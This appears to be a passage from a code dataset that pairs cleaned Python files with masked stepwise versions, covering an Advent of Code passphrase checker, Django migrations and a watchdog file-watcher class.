    """Count the passphrases in *filename* containing no duplicate words.

    Each line of the file is one passphrase: lowercase words separated by
    single spaces. Returns the number of valid passphrases.
    """
    # `with` guarantees the file is closed even if reading raises.
    with open(filename, 'r') as f:
        lines = f.readlines()

    result = 0
    for line in lines:
        words = line.rstrip().split(' ')
        # Valid when deduplicating into a set loses nothing.
        if len(words) == len(set(words)):
            result += 1
    return result
"""For added security, yet another system policy has been put in place.
Now, a valid passphrase must contain no two words that are anagrams of
each other - that is, a passphrase is invalid if any word's letters can
be rearranged to form any other word in the passphrase.
"""
def valid_anagram(filename):
    """Count the passphrases in *filename* with no two words that are anagrams.

    Two words are anagrams when one's letters can be rearranged to form the
    other, i.e. their sorted letter sequences are equal. Returns the number
    of valid passphrases.
    """
    # `with` guarantees the file is closed even if reading raises.
    with open(filename, 'r') as f:
        lines = f.readlines()

    result = 0
    for line in lines:
        words = line.rstrip().split(' ')
        # Canonicalise each word by sorting its letters; tuples are hashable,
        # so the set collapses anagrams together (the original list.count()
        # scan was O(n^2) per line).
        canonical = [tuple(sorted(w)) for w in words]
        if len(canonical) == len(set(canonical)):
            result += 1
    return result
# Entry point: print both puzzle answers for the day's input file
# (assumes day4-input.txt exists in the working directory).
if __name__ == '__main__':
	print(valid('day4-input.txt'))
	print(valid_anagram('day4-input.txt'))
|
normal
|
{
"blob_id": "7dce240a891e807b1f5251a09a69368f4e513973",
"index": 4472,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef valid_anagram(filename):\n f = open(filename, 'r')\n lines = f.readlines()\n f.close()\n result = len(lines)\n for line in lines:\n split = line.rstrip().split(' ')\n split = [sorted(s) for s in split]\n for word in split:\n if split.count(word) > 1:\n result -= 1\n break\n return result\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef valid(filename):\n f = open(filename, 'r')\n lines = f.readlines()\n f.close()\n result = 0\n for line in lines:\n split = line.rstrip().split(' ')\n if len(split) == len(set(split)):\n result += 1\n return result\n\n\n<mask token>\n\n\ndef valid_anagram(filename):\n f = open(filename, 'r')\n lines = f.readlines()\n f.close()\n result = len(lines)\n for line in lines:\n split = line.rstrip().split(' ')\n split = [sorted(s) for s in split]\n for word in split:\n if split.count(word) > 1:\n result -= 1\n break\n return result\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef valid(filename):\n f = open(filename, 'r')\n lines = f.readlines()\n f.close()\n result = 0\n for line in lines:\n split = line.rstrip().split(' ')\n if len(split) == len(set(split)):\n result += 1\n return result\n\n\n<mask token>\n\n\ndef valid_anagram(filename):\n f = open(filename, 'r')\n lines = f.readlines()\n f.close()\n result = len(lines)\n for line in lines:\n split = line.rstrip().split(' ')\n split = [sorted(s) for s in split]\n for word in split:\n if split.count(word) > 1:\n result -= 1\n break\n return result\n\n\nif __name__ == '__main__':\n print(valid('day4-input.txt'))\n print(valid_anagram('day4-input.txt'))\n",
"step-5": "# Advent of Code: Day 4\n\n\"\"\"A new system policy has been put in place that requires all accounts to \nuse a passphrase instead of simply a password. A passphrase consists of a \nseries of words (lowercase letters) separated by spaces.\n\nTo ensure security, a valid passphrase must contain no duplicate words.\n\n\"\"\"\ndef valid(filename):\n\tf = open(filename, 'r')\n\tlines = f.readlines()\n\tf.close()\n\t\n\tresult = 0\n\tfor line in lines:\n\t\tsplit = line.rstrip().split(' ')\n\t\tif len(split) == len(set(split)):\n\t\t\tresult += 1\t\t\n\t\t\t\n\treturn result\n\t\n\n\"\"\"For added security, yet another system policy has been put in place. \nNow, a valid passphrase must contain no two words that are anagrams of \neach other - that is, a passphrase is invalid if any word's letters can \nbe rearranged to form any other word in the passphrase.\n\n\"\"\"\t\t\ndef valid_anagram(filename):\n\tf = open(filename, 'r')\n\tlines = f.readlines()\n\tf.close()\n\t\n\tresult = len(lines)\n\tfor line in lines:\n\t\tsplit = line.rstrip().split(' ')\n\t\tsplit = [sorted(s) for s in split]\n\t\tfor word in split:\n\t\t\tif split.count(word) > 1:\n\t\t\t\tresult -= 1\n\t\t\t\tbreak\t\t\n\t\t\t\n\treturn result\t\n\t\n\t\nif __name__ == '__main__':\n\tprint(valid('day4-input.txt'))\n\tprint(valid_anagram('day4-input.txt'))",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# Generated by Django 2.0.7 on 2018-09-27 13:40
from django.db import migrations, models
class Migration(migrations.Migration):
    """Move group membership from EducationGroup.students onto Student.

    Drops the many-to-many field held on the group side and re-creates an
    equivalent (optional) many-to-many field on Student pointing back at
    EducationGroup. NOTE(review): RemoveField discards the old relation's
    rows; existing memberships are not carried over by this migration.
    """

    dependencies = [
        ('education', '0005_auto_20180927_1041'),
    ]

    operations = [
        # Drop the old relation held on the group side.
        migrations.RemoveField(
            model_name='educationgroup',
            name='students',
        ),
        # Re-create the relation on the student side; blank=True keeps the
        # field optional in forms/admin.
        migrations.AddField(
            model_name='student',
            name='education_groups',
            field=models.ManyToManyField(blank=True, to='education.EducationGroup', verbose_name='Education Groups'),
        ),
    ]
|
normal
|
{
"blob_id": "8ff7ace102b781b35fff0671e2c606bf662e2767",
"index": 9851,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('education', '0005_auto_20180927_1041')]\n operations = [migrations.RemoveField(model_name='educationgroup', name=\n 'students'), migrations.AddField(model_name='student', name=\n 'education_groups', field=models.ManyToManyField(blank=True, to=\n 'education.EducationGroup', verbose_name='Education Groups'))]\n",
"step-4": "from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('education', '0005_auto_20180927_1041')]\n operations = [migrations.RemoveField(model_name='educationgroup', name=\n 'students'), migrations.AddField(model_name='student', name=\n 'education_groups', field=models.ManyToManyField(blank=True, to=\n 'education.EducationGroup', verbose_name='Education Groups'))]\n",
"step-5": "# Generated by Django 2.0.7 on 2018-09-27 13:40\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('education', '0005_auto_20180927_1041'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='educationgroup',\n name='students',\n ),\n migrations.AddField(\n model_name='student',\n name='education_groups',\n field=models.ManyToManyField(blank=True, to='education.EducationGroup', verbose_name='Education Groups'),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class MachopWatchCommand(MachopProcess):
class MachopHandler(PatternMatchingEventHandler):
""" watcher for a file system event """
def on_modified(self, event):
if event.is_directory:
return
source = event.src_path
self._watcher.modified(source)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def modified(self, eventsrc):
"""
@@@ needs proper event handling for actions!!!
"""
if not self.has_changed(eventsrc):
return
matched = False
for pattern in self.globs:
if fnmatch.fnmatch(eventsrc, pattern):
matched = True
break
if matched:
for action in self.actions:
action(cmdpath=eventsrc, log=MachopLog(self.queue, 'watch'))
self.announce()
def announce(self, nl=False):
log = self.log
msg = 'watching ' + log.yellow(self.watchpath)
for match in self.globs:
msg += ' for [' + log.yellow(match) + ']'
msg += '...'
if nl:
msg += '\n'
log.out(msg)
def run(self):
self.log = MachopLog(self.queue, 'watch')
self.handler = self.MachopHandler(patterns=self.globs)
self.handler._watcher = self
self.observer = Observer()
self.observer.schedule(self.handler, self.watchpath, recursive=True)
self.observer.start()
self.announce(True)
wait_for_interrupt(self.observer)
self.observer.stop()
self.observer.join(3)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class MachopWatchCommand(MachopProcess):
class MachopHandler(PatternMatchingEventHandler):
""" watcher for a file system event """
def on_modified(self, event):
if event.is_directory:
return
source = event.src_path
self._watcher.modified(source)
def __init__(self, globs=None, cmds=None, path=None, queue=None):
super(MachopWatchCommand, self).__init__()
recreate = globs, cmds, path, queue
self._safe_process(queue=queue, cfgpath=path, init=recreate)
self.globs = globs if globs else []
self.actions = cmds if cmds else []
self.watchpath = path
self.queue = queue
self.hashmap = {}
self.log = None
<|reserved_special_token_0|>
def modified(self, eventsrc):
"""
@@@ needs proper event handling for actions!!!
"""
if not self.has_changed(eventsrc):
return
matched = False
for pattern in self.globs:
if fnmatch.fnmatch(eventsrc, pattern):
matched = True
break
if matched:
for action in self.actions:
action(cmdpath=eventsrc, log=MachopLog(self.queue, 'watch'))
self.announce()
def announce(self, nl=False):
log = self.log
msg = 'watching ' + log.yellow(self.watchpath)
for match in self.globs:
msg += ' for [' + log.yellow(match) + ']'
msg += '...'
if nl:
msg += '\n'
log.out(msg)
def run(self):
self.log = MachopLog(self.queue, 'watch')
self.handler = self.MachopHandler(patterns=self.globs)
self.handler._watcher = self
self.observer = Observer()
self.observer.schedule(self.handler, self.watchpath, recursive=True)
self.observer.start()
self.announce(True)
wait_for_interrupt(self.observer)
self.observer.stop()
self.observer.join(3)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class MachopWatchCommand(MachopProcess):
class MachopHandler(PatternMatchingEventHandler):
""" watcher for a file system event """
def on_modified(self, event):
if event.is_directory:
return
source = event.src_path
self._watcher.modified(source)
def __init__(self, globs=None, cmds=None, path=None, queue=None):
super(MachopWatchCommand, self).__init__()
recreate = globs, cmds, path, queue
self._safe_process(queue=queue, cfgpath=path, init=recreate)
self.globs = globs if globs else []
self.actions = cmds if cmds else []
self.watchpath = path
self.queue = queue
self.hashmap = {}
self.log = None
def set_queue(self, queue):
self.queue = queue
def modified(self, eventsrc):
"""
@@@ needs proper event handling for actions!!!
"""
if not self.has_changed(eventsrc):
return
matched = False
for pattern in self.globs:
if fnmatch.fnmatch(eventsrc, pattern):
matched = True
break
if matched:
for action in self.actions:
action(cmdpath=eventsrc, log=MachopLog(self.queue, 'watch'))
self.announce()
def announce(self, nl=False):
log = self.log
msg = 'watching ' + log.yellow(self.watchpath)
for match in self.globs:
msg += ' for [' + log.yellow(match) + ']'
msg += '...'
if nl:
msg += '\n'
log.out(msg)
def run(self):
self.log = MachopLog(self.queue, 'watch')
self.handler = self.MachopHandler(patterns=self.globs)
self.handler._watcher = self
self.observer = Observer()
self.observer.schedule(self.handler, self.watchpath, recursive=True)
self.observer.start()
self.announce(True)
wait_for_interrupt(self.observer)
self.observer.stop()
self.observer.join(3)
def has_changed(self, key):
hasher = hashlib.md5()
with open(key, 'rb') as modfile:
hasher.update(modfile.read())
xhash = hasher.hexdigest()
if self.hashmap.get(key, '') != xhash:
self.hashmap[key] = xhash
return True
return False
<|reserved_special_token_1|>
import fnmatch
import hashlib
from .mplog import MachopLog
from .utils import MachopProcess, wait_for_interrupt
from watchdog.observers import Observer
from watchdog.events import PatternMatchingEventHandler
class MachopWatchCommand(MachopProcess):
    """Watch a directory tree and run configured actions when files change.

    Glob patterns select which modified paths trigger the actions; an md5
    digest per file suppresses duplicate events for unchanged content.
    """

    class MachopHandler(PatternMatchingEventHandler):
        """Watchdog handler forwarding modified-file events to its owner.

        ``_watcher`` is attached after construction (see ``run``) and
        points back at the owning MachopWatchCommand.
        """
        def on_modified(self, event):
            # Directory events carry no file content to hash; ignore them.
            if event.is_directory:
                return
            source = event.src_path
            self._watcher.modified(source)
    def __init__(self, globs=None, cmds=None, path=None, queue=None):
        """Configure the watcher.

        globs -- glob patterns a changed path must match to trigger actions
        cmds  -- callables invoked as ``action(cmdpath=..., log=...)``
        path  -- root directory to observe (recursively)
        queue -- log-message queue shared with the parent process
        """
        super(MachopWatchCommand, self).__init__()
        # Constructor args bundled together; presumably lets MachopProcess
        # respawn an equivalent instance — TODO confirm in MachopProcess.
        recreate = globs, cmds, path, queue
        self._safe_process(queue=queue, cfgpath=path, init=recreate)
        self.globs = globs if globs else []
        self.actions = cmds if cmds else []
        self.watchpath = path
        self.queue = queue
        # path -> md5 hex digest of the file content last seen.
        self.hashmap = {}
        # MachopLog instance; created in run() on the child-process side.
        self.log = None
    def set_queue(self, queue):
        # Lets the parent swap in a new log queue before the process runs.
        self.queue = queue
    def modified(self, eventsrc):
        """Run every configured action for a changed path matching a glob.

        @@@ needs proper event handling for actions!!!
        """
        # Editors often fire several modify events per save; skip events
        # where the content hash is unchanged.
        if not self.has_changed(eventsrc):
            return
        matched = False
        for pattern in self.globs:
            if fnmatch.fnmatch(eventsrc, pattern):
                matched = True
                break
        if matched:
            for action in self.actions:
                # Each action gets a fresh MachopLog bound to the shared queue.
                action(cmdpath=eventsrc, log=MachopLog(self.queue, 'watch'))
            self.announce()
    def announce(self, nl=False):
        """Log a ``watching <path> for [<glob>]...`` status line.

        nl -- append a trailing newline (used for the first announcement).
        """
        log = self.log
        msg = 'watching ' + log.yellow(self.watchpath)
        for match in self.globs:
            msg += ' for [' + log.yellow(match) + ']'
        msg += '...'
        if nl:
            msg += '\n'
        log.out(msg)
    def run(self):
        """Process entry point: observe ``watchpath`` until interrupted."""
        self.log = MachopLog(self.queue, 'watch')
        self.handler = self.MachopHandler(patterns=self.globs)
        # Wire the handler back to this watcher so events reach modified().
        self.handler._watcher = self
        self.observer = Observer()
        self.observer.schedule(self.handler, self.watchpath, recursive=True)
        self.observer.start()
        self.announce(True)
        wait_for_interrupt(self.observer)
        self.observer.stop()
        # Bounded join so shutdown cannot hang on a stuck observer thread.
        self.observer.join(3)
    def has_changed(self, key):
        """Return True (and record the new digest) if file content changed.

        key -- filesystem path of the modified file.
        """
        hasher = hashlib.md5()
        with open(key, 'rb') as modfile:
            hasher.update(modfile.read())
        xhash = hasher.hexdigest()
        if self.hashmap.get(key, '') != xhash:
            self.hashmap[key] = xhash
            return True
        return False
<|reserved_special_token_1|>
import fnmatch
import hashlib
from .mplog import MachopLog
from .utils import MachopProcess, wait_for_interrupt
from watchdog.observers import Observer
from watchdog.events import PatternMatchingEventHandler
class MachopWatchCommand(MachopProcess):
    """File-system watcher process that triggers actions on file changes.

    A path is acted on only when it matches one of the configured glob
    patterns and its md5 content digest differs from the last one seen.
    """

    class MachopHandler(PatternMatchingEventHandler):
        """Watchdog event handler; relays modifications to the watcher.

        The ``_watcher`` back-reference is assigned externally in
        ``MachopWatchCommand.run``.
        """
        def on_modified(self, event):
            # Skip directory-level events; only file content matters here.
            if event.is_directory:
                return
            source = event.src_path
            self._watcher.modified(source)
    def __init__(self, globs=None, cmds=None, path=None, queue=None):
        """Set up watcher state.

        globs -- glob patterns that changed paths must match
        cmds  -- action callables, called as ``action(cmdpath=..., log=...)``
        path  -- directory root observed recursively
        queue -- shared logging queue
        """
        super(MachopWatchCommand, self).__init__()
        # Bundle of init args; presumably used by the base class to
        # recreate this process — TODO confirm against MachopProcess.
        recreate = (globs, cmds, path, queue)
        self._safe_process(queue=queue, cfgpath=path, init=recreate)
        self.globs = globs if globs else []
        self.actions = cmds if cmds else []
        self.watchpath = path
        self.queue = queue
        # Maps file path -> md5 hex digest last observed for that file.
        self.hashmap = {}
        # Logger is deferred to run(), i.e. the child-process side.
        self.log = None
    def set_queue(self, queue):
        # Allow replacing the log queue before the process starts.
        self.queue = queue
    def modified(self, eventsrc):
        """
        @@@ needs proper event handling for actions!!!
        """
        # Drop duplicate events for files whose content did not change.
        if not self.has_changed(eventsrc):
            return
        matched = False
        for pattern in self.globs:
            if fnmatch.fnmatch(eventsrc, pattern):
                matched = True
                break
        if matched:
            for action in self.actions:
                # A fresh MachopLog per action, bound to the shared queue.
                action(cmdpath=eventsrc, log=MachopLog(self.queue, 'watch'))
            self.announce()
    def announce(self, nl=False):
        """Emit a status line listing the watched path and glob patterns.

        nl -- when True, append a newline (first announcement only).
        """
        log = self.log
        msg = "watching " + log.yellow(self.watchpath)
        for match in self.globs:
            msg += " for [" + log.yellow(match) + "]"
        msg += "..."
        if nl:
            msg += '\n'
        log.out(msg)
    def run(self):
        """Child-process entry point: watch until interrupted."""
        self.log = MachopLog(self.queue, 'watch')
        self.handler = self.MachopHandler(patterns=self.globs)
        # Give the handler a back-reference so events reach modified().
        self.handler._watcher = self
        self.observer = Observer()
        self.observer.schedule(self.handler, self.watchpath, recursive=True)
        self.observer.start()
        self.announce(True)
        wait_for_interrupt(self.observer)
        self.observer.stop()
        # Join with a timeout so a wedged observer thread cannot block exit.
        self.observer.join(3)
    def has_changed(self, key):
        """Return True and record the digest when ``key``'s content changed.

        key -- path of the file reported as modified.
        """
        hasher = hashlib.md5()
        with open(key, 'rb') as modfile:
            hasher.update(modfile.read())
        xhash = hasher.hexdigest()
        if self.hashmap.get(key, "") != xhash:
            self.hashmap[key] = xhash
            return True
        return False
|
flexible
|
{
"blob_id": "4e30f0a9b420123c28858aad2a71040dcc952829",
"index": 1391,
"step-1": "<mask token>\n\n\nclass MachopWatchCommand(MachopProcess):\n\n\n class MachopHandler(PatternMatchingEventHandler):\n \"\"\" watcher for a file system event \"\"\"\n\n def on_modified(self, event):\n if event.is_directory:\n return\n source = event.src_path\n self._watcher.modified(source)\n <mask token>\n <mask token>\n\n def modified(self, eventsrc):\n \"\"\"\n @@@ needs proper event handling for actions!!!\n \"\"\"\n if not self.has_changed(eventsrc):\n return\n matched = False\n for pattern in self.globs:\n if fnmatch.fnmatch(eventsrc, pattern):\n matched = True\n break\n if matched:\n for action in self.actions:\n action(cmdpath=eventsrc, log=MachopLog(self.queue, 'watch'))\n self.announce()\n\n def announce(self, nl=False):\n log = self.log\n msg = 'watching ' + log.yellow(self.watchpath)\n for match in self.globs:\n msg += ' for [' + log.yellow(match) + ']'\n msg += '...'\n if nl:\n msg += '\\n'\n log.out(msg)\n\n def run(self):\n self.log = MachopLog(self.queue, 'watch')\n self.handler = self.MachopHandler(patterns=self.globs)\n self.handler._watcher = self\n self.observer = Observer()\n self.observer.schedule(self.handler, self.watchpath, recursive=True)\n self.observer.start()\n self.announce(True)\n wait_for_interrupt(self.observer)\n self.observer.stop()\n self.observer.join(3)\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass MachopWatchCommand(MachopProcess):\n\n\n class MachopHandler(PatternMatchingEventHandler):\n \"\"\" watcher for a file system event \"\"\"\n\n def on_modified(self, event):\n if event.is_directory:\n return\n source = event.src_path\n self._watcher.modified(source)\n\n def __init__(self, globs=None, cmds=None, path=None, queue=None):\n super(MachopWatchCommand, self).__init__()\n recreate = globs, cmds, path, queue\n self._safe_process(queue=queue, cfgpath=path, init=recreate)\n self.globs = globs if globs else []\n self.actions = cmds if cmds else []\n self.watchpath = path\n self.queue = queue\n self.hashmap = {}\n self.log = None\n <mask token>\n\n def modified(self, eventsrc):\n \"\"\"\n @@@ needs proper event handling for actions!!!\n \"\"\"\n if not self.has_changed(eventsrc):\n return\n matched = False\n for pattern in self.globs:\n if fnmatch.fnmatch(eventsrc, pattern):\n matched = True\n break\n if matched:\n for action in self.actions:\n action(cmdpath=eventsrc, log=MachopLog(self.queue, 'watch'))\n self.announce()\n\n def announce(self, nl=False):\n log = self.log\n msg = 'watching ' + log.yellow(self.watchpath)\n for match in self.globs:\n msg += ' for [' + log.yellow(match) + ']'\n msg += '...'\n if nl:\n msg += '\\n'\n log.out(msg)\n\n def run(self):\n self.log = MachopLog(self.queue, 'watch')\n self.handler = self.MachopHandler(patterns=self.globs)\n self.handler._watcher = self\n self.observer = Observer()\n self.observer.schedule(self.handler, self.watchpath, recursive=True)\n self.observer.start()\n self.announce(True)\n wait_for_interrupt(self.observer)\n self.observer.stop()\n self.observer.join(3)\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass MachopWatchCommand(MachopProcess):\n\n\n class MachopHandler(PatternMatchingEventHandler):\n \"\"\" watcher for a file system event \"\"\"\n\n def on_modified(self, event):\n if event.is_directory:\n return\n source = event.src_path\n self._watcher.modified(source)\n\n def __init__(self, globs=None, cmds=None, path=None, queue=None):\n super(MachopWatchCommand, self).__init__()\n recreate = globs, cmds, path, queue\n self._safe_process(queue=queue, cfgpath=path, init=recreate)\n self.globs = globs if globs else []\n self.actions = cmds if cmds else []\n self.watchpath = path\n self.queue = queue\n self.hashmap = {}\n self.log = None\n\n def set_queue(self, queue):\n self.queue = queue\n\n def modified(self, eventsrc):\n \"\"\"\n @@@ needs proper event handling for actions!!!\n \"\"\"\n if not self.has_changed(eventsrc):\n return\n matched = False\n for pattern in self.globs:\n if fnmatch.fnmatch(eventsrc, pattern):\n matched = True\n break\n if matched:\n for action in self.actions:\n action(cmdpath=eventsrc, log=MachopLog(self.queue, 'watch'))\n self.announce()\n\n def announce(self, nl=False):\n log = self.log\n msg = 'watching ' + log.yellow(self.watchpath)\n for match in self.globs:\n msg += ' for [' + log.yellow(match) + ']'\n msg += '...'\n if nl:\n msg += '\\n'\n log.out(msg)\n\n def run(self):\n self.log = MachopLog(self.queue, 'watch')\n self.handler = self.MachopHandler(patterns=self.globs)\n self.handler._watcher = self\n self.observer = Observer()\n self.observer.schedule(self.handler, self.watchpath, recursive=True)\n self.observer.start()\n self.announce(True)\n wait_for_interrupt(self.observer)\n self.observer.stop()\n self.observer.join(3)\n\n def has_changed(self, key):\n hasher = hashlib.md5()\n with open(key, 'rb') as modfile:\n hasher.update(modfile.read())\n xhash = hasher.hexdigest()\n if self.hashmap.get(key, '') != xhash:\n self.hashmap[key] = xhash\n return True\n return False\n",
"step-4": "import fnmatch\nimport hashlib\nfrom .mplog import MachopLog\nfrom .utils import MachopProcess, wait_for_interrupt\nfrom watchdog.observers import Observer\nfrom watchdog.events import PatternMatchingEventHandler\n\n\nclass MachopWatchCommand(MachopProcess):\n\n\n class MachopHandler(PatternMatchingEventHandler):\n \"\"\" watcher for a file system event \"\"\"\n\n def on_modified(self, event):\n if event.is_directory:\n return\n source = event.src_path\n self._watcher.modified(source)\n\n def __init__(self, globs=None, cmds=None, path=None, queue=None):\n super(MachopWatchCommand, self).__init__()\n recreate = globs, cmds, path, queue\n self._safe_process(queue=queue, cfgpath=path, init=recreate)\n self.globs = globs if globs else []\n self.actions = cmds if cmds else []\n self.watchpath = path\n self.queue = queue\n self.hashmap = {}\n self.log = None\n\n def set_queue(self, queue):\n self.queue = queue\n\n def modified(self, eventsrc):\n \"\"\"\n @@@ needs proper event handling for actions!!!\n \"\"\"\n if not self.has_changed(eventsrc):\n return\n matched = False\n for pattern in self.globs:\n if fnmatch.fnmatch(eventsrc, pattern):\n matched = True\n break\n if matched:\n for action in self.actions:\n action(cmdpath=eventsrc, log=MachopLog(self.queue, 'watch'))\n self.announce()\n\n def announce(self, nl=False):\n log = self.log\n msg = 'watching ' + log.yellow(self.watchpath)\n for match in self.globs:\n msg += ' for [' + log.yellow(match) + ']'\n msg += '...'\n if nl:\n msg += '\\n'\n log.out(msg)\n\n def run(self):\n self.log = MachopLog(self.queue, 'watch')\n self.handler = self.MachopHandler(patterns=self.globs)\n self.handler._watcher = self\n self.observer = Observer()\n self.observer.schedule(self.handler, self.watchpath, recursive=True)\n self.observer.start()\n self.announce(True)\n wait_for_interrupt(self.observer)\n self.observer.stop()\n self.observer.join(3)\n\n def has_changed(self, key):\n hasher = hashlib.md5()\n with open(key, 'rb') 
as modfile:\n hasher.update(modfile.read())\n xhash = hasher.hexdigest()\n if self.hashmap.get(key, '') != xhash:\n self.hashmap[key] = xhash\n return True\n return False\n",
"step-5": "\nimport fnmatch\nimport hashlib\n\nfrom .mplog import MachopLog\nfrom .utils import MachopProcess, wait_for_interrupt\n\nfrom watchdog.observers import Observer\nfrom watchdog.events import PatternMatchingEventHandler\n\n\nclass MachopWatchCommand(MachopProcess):\n\n class MachopHandler(PatternMatchingEventHandler):\n \"\"\" watcher for a file system event \"\"\"\n def on_modified(self, event):\n if event.is_directory:\n return\n source = event.src_path\n self._watcher.modified(source)\n\n def __init__(self, globs=None, cmds=None, path=None, queue=None):\n super(MachopWatchCommand, self).__init__()\n recreate = (globs, cmds, path, queue)\n self._safe_process(queue=queue, cfgpath=path, init=recreate)\n self.globs = globs if globs else []\n self.actions = cmds if cmds else []\n self.watchpath = path\n self.queue = queue\n self.hashmap = {}\n self.log = None\n\n def set_queue(self, queue):\n self.queue = queue\n\n def modified(self, eventsrc):\n \"\"\"\n @@@ needs proper event handling for actions!!!\n \"\"\"\n if not self.has_changed(eventsrc):\n return\n matched = False\n for pattern in self.globs:\n if fnmatch.fnmatch(eventsrc, pattern):\n matched = True\n break\n if matched:\n for action in self.actions:\n action(cmdpath=eventsrc, log=MachopLog(self.queue, 'watch'))\n self.announce()\n\n def announce(self, nl=False):\n log = self.log\n msg = \"watching \" + log.yellow(self.watchpath)\n for match in self.globs:\n msg += \" for [\" + log.yellow(match) + \"]\"\n msg += \"...\"\n if nl:\n msg += '\\n'\n log.out(msg)\n\n def run(self):\n self.log = MachopLog(self.queue, 'watch')\n self.handler = self.MachopHandler(patterns=self.globs)\n self.handler._watcher = self\n self.observer = Observer()\n self.observer.schedule(self.handler, self.watchpath, recursive=True)\n self.observer.start()\n self.announce(True)\n wait_for_interrupt(self.observer)\n self.observer.stop()\n self.observer.join(3)\n\n def has_changed(self, key):\n hasher = hashlib.md5()\n with 
open(key, 'rb') as modfile:\n hasher.update(modfile.read())\n xhash = hasher.hexdigest()\n if self.hashmap.get(key, \"\") != xhash:\n self.hashmap[key] = xhash\n return True\n return False\n",
"step-ids": [
4,
5,
7,
8,
9
]
}
|
[
4,
5,
7,
8,
9
] |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-08-04 13:16
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial migration: create the project's custom ``User`` model.

    Carries Django's standard auth fields (password, last_login,
    is_superuser, groups, user_permissions) alongside project fields
    (email, username, name parts, ip, organisation FK); verbose names
    are in Russian. Requires ``enterprise.Organisation`` to exist first.
    """

    initial = True

    dependencies = [
        ('auth', '0007_alter_validators_add_error_messages'),
        ('enterprise', '0002_auto_20160804_1616'),
    ]

    operations = [
        migrations.CreateModel(
            name='User',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('password', models.CharField(max_length=128, verbose_name='password')),
                ('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
                ('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
                # Both email and username are unique; either could serve as
                # the login identifier — USERNAME_FIELD is defined on the
                # model class, not visible here.
                ('email', models.EmailField(blank=True, max_length=255, unique=True, verbose_name='Электронная почта')),
                ('username', models.CharField(db_index=True, max_length=40, unique=True, verbose_name='Идентификатор')),
                ('created_at', models.DateField(auto_now_add=True, verbose_name='Дата регистрации')),
                ('is_active', models.BooleanField(default=True, verbose_name='Активен')),
                ('ip', models.GenericIPAddressField(blank=True, null=True, verbose_name='IP адрес')),
                ('surname', models.CharField(blank=True, max_length=50, verbose_name='Фамилия')),
                ('first_name', models.CharField(blank=True, max_length=25, verbose_name='Имя')),
                ('middle_name', models.CharField(blank=True, max_length=25, verbose_name='Отчество')),
                ('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),
                ('organisation', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='enterprise.Organisation', verbose_name='Сотрудник организации')),
                ('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),
            ],
            options={
                'verbose_name': 'Пользователь',
                'verbose_name_plural': 'Пользователи',
            },
        ),
    ]
|
normal
|
{
"blob_id": "71662ff8c68559bf08e1da7f1a1504bfe842c950",
"index": 7430,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = [('auth', '0007_alter_validators_add_error_messages'), (\n 'enterprise', '0002_auto_20160804_1616')]\n operations = [migrations.CreateModel(name='User', fields=[('id', models\n .AutoField(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')), ('password', models.CharField(max_length=128,\n verbose_name='password')), ('last_login', models.DateTimeField(\n blank=True, null=True, verbose_name='last login')), ('is_superuser',\n models.BooleanField(default=False, help_text=\n 'Designates that this user has all permissions without explicitly assigning them.'\n , verbose_name='superuser status')), ('email', models.EmailField(\n blank=True, max_length=255, unique=True, verbose_name=\n 'Электронная почта')), ('username', models.CharField(db_index=True,\n max_length=40, unique=True, verbose_name='Идентификатор')), (\n 'created_at', models.DateField(auto_now_add=True, verbose_name=\n 'Дата регистрации')), ('is_active', models.BooleanField(default=\n True, verbose_name='Активен')), ('ip', models.GenericIPAddressField\n (blank=True, null=True, verbose_name='IP адрес')), ('surname',\n models.CharField(blank=True, max_length=50, verbose_name='Фамилия')\n ), ('first_name', models.CharField(blank=True, max_length=25,\n verbose_name='Имя')), ('middle_name', models.CharField(blank=True,\n max_length=25, verbose_name='Отчество')), ('groups', models.\n ManyToManyField(blank=True, help_text=\n 'The groups this user belongs to. 
A user will get all permissions granted to each of their groups.'\n , related_name='user_set', related_query_name='user', to=\n 'auth.Group', verbose_name='groups')), ('organisation', models.\n ForeignKey(blank=True, null=True, on_delete=django.db.models.\n deletion.CASCADE, to='enterprise.Organisation', verbose_name=\n 'Сотрудник организации')), ('user_permissions', models.\n ManyToManyField(blank=True, help_text=\n 'Specific permissions for this user.', related_name='user_set',\n related_query_name='user', to='auth.Permission', verbose_name=\n 'user permissions'))], options={'verbose_name': 'Пользователь',\n 'verbose_name_plural': 'Пользователи'})]\n",
